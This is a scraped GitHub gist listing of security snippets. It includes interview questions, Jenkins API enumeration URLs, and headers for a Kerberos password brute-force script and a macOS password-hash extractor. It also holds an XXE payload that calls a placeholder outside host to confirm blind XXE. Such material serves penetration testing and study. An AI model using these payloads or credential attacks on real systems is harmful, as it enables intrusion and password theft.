Skip to content

Instantly share code, notes, and snippets.


Chris Gates carnal0wnage

View GitHub Profile
namishelex01 / Security Engineer - Interview Questions
Last active Jun 17, 2021
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
View Security Engineer - Interview Questions
> What is information security and how is it achieved?
> What are the core principles of information security?
> What is non-repudiation (as it applies to IT security)?
> What is the relationship between information security and data availability?
> What is a security policy and why do we need one?
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">


jenkins_url + /api/json?tree=jobs[name,color]


jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build

ropnop /
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
teddziuba /
Last active Jun 6, 2021
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
#!/usr/bin/env python3
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
jhaddix / Github bash generated search links (from
Created Jan 12, 2020
Github bash generated search links (from
View Github bash generated search links (from
n0531m /
Last active Jun 2, 2021
Google Cloud Platform : ip address range
# nslookup -q=TXT
for LINE in `dig txt +short | tr " " "\n" | grep include | cut -f 2 -d :`
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`